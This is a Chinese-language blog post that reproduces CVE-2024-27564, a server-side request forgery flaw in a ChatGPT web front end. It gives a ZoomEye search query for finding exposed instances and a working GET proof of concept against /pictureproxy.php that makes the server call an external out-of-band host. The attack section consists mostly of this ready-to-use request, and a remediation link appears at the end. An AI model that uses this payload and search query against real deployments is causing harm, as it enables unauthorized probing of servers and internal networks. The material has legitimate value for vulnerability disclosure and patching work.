ChatGPT服务器端请求伪造漏洞(CVE-2024-27564)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!
0x01漏洞介绍
ChatGPT是一个基于OpenAI ChatGPT项目API的可视化界面站点。
ChatGPT commit f9f4bbc版本存在安全漏洞,该漏洞源于存在服务器请求伪造(SSRF)漏洞。攻击者可利用该漏洞通过向urlparameter注入特制的URL来迫使应用程序执行任意请求。
0x02影响版本
ChatGPT commit f9f4bbc版本
0x03漏洞复现
zoomeye语法
app:"ChatGPT"
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /pictureproxy.php?url=http://co1ooflblq62hd1n40rg6e11zdodrdikw.oast.fun HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, br
执行payload
测试DNSlog(漏洞存在)
3.nuclei工具测试(漏洞存在)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/dirk1983/chatgpt/issues/114
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果